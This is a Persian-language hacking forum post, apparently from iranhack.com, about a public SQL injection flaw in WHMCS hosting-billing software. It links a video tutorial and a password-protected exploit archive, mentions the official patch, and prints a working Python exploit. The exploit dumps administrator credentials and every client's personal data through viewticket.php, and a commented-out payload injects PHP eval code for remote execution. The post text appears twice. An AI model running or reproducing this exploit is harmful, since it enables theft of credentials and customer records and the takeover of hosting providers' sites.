با سلام خدمت تمامی دوستان عزیز
چند روزی هست که یک باگ SQLi از WHMCS پابلیک شده که کمی امنیت سایت های هاستینگ که از این CMS و این ورژن استفاده میکنند رو به خطر میندازه...
یک فیلم آموزشی از این باگ تهیه شده که میتونید از لینک زیر دانلود کنید :
http://iranhack.com/dl/whmcs_new_bug.part1.rar
http://iranhack.com/dl/whmcs_new_bug.part2.rar
http://iranhack.com/dl/whmcs_new_bug.part3.rar
http://iranhack.com/dl/whmcs_new_bug.part4.rar
http://iranhack.com/dl/whmcs_new_bug.part5.rar
http://iranhack.com/dl/whmcs_new_bug.part6.rar
http://iranhack.com/dl/whmcs_new_bug.part7.rar
لینک دانلود اکسپلویت :
http://iranhack.com/dl/expl.rar
پسورد فایل های فشرده : iranhackforever
ابتدا همه ی پارت ها رو دانلود کرده و سپس در یک مکان از حالت فشرده خارج کنید
و اما برای پچ کردن، این فایل رو میتونید از وبسایت رسمی whmcs دانلود کنید : http://www.whmcs.com/members/dl.php?type=d&id=418
و فایل های موجود در این فایل رو جایگزین فایل های فعلی کنید...
کد اکسپلویت برای عزیزانی که با utf ویندوز و لینوکس مشکل دارند :
موفق باشید
چند روزی هست که یک باگ SQLi از WHMCS پابلیک شده که کمی امنیت سایت های هاستینگ که از این CMS و این ورژن استفاده میکنند رو به خطر میندازه...
یک فیلم آموزشی از این باگ تهیه شده که میتونید از لینک زیر دانلود کنید :
http://iranhack.com/dl/whmcs_new_bug.part1.rar
http://iranhack.com/dl/whmcs_new_bug.part2.rar
http://iranhack.com/dl/whmcs_new_bug.part3.rar
http://iranhack.com/dl/whmcs_new_bug.part4.rar
http://iranhack.com/dl/whmcs_new_bug.part5.rar
http://iranhack.com/dl/whmcs_new_bug.part6.rar
http://iranhack.com/dl/whmcs_new_bug.part7.rar
لینک دانلود اکسپلویت :
http://iranhack.com/dl/expl.rar
پسورد فایل های فشرده : iranhackforever
ابتدا همه ی پارت ها رو دانلود کرده و سپس در یک مکان از حالت فشرده خارج کنید
و اما برای پچ کردن، این فایل رو میتونید از وبسایت رسمی whmcs دانلود کنید : http://www.whmcs.com/members/dl.php?type=d&id=418
و فایل های موجود در این فایل رو جایگزین فایل های فعلی کنید...
کد اکسپلویت برای عزیزانی که با utf ویندوز و لینوکس مشکل دارند :
کد:
#!/usr/bin/env python url = 'http://target.com' import urllib, re, sys from urllib2 import Request, urlopen ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" def exploit(sql): sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql print "Doing stuff: %s" % sqlUnion #you could exploit any file that does a select, I randomly chose viewticket.php r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read() return re.search(r'<div class="clientmsg">(.*?)</div>', r, re.DOTALL).group(1).strip() #get admins print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') #get users count = int(exploit('(SELECT COUNT(id) FROM tblclients)')) print "User count %d" % count for i in range(count): print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i) #are you evil? yes, you are! #php = "1';eval($_REQUEST['lol_whmcs']);#" #r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()
نظر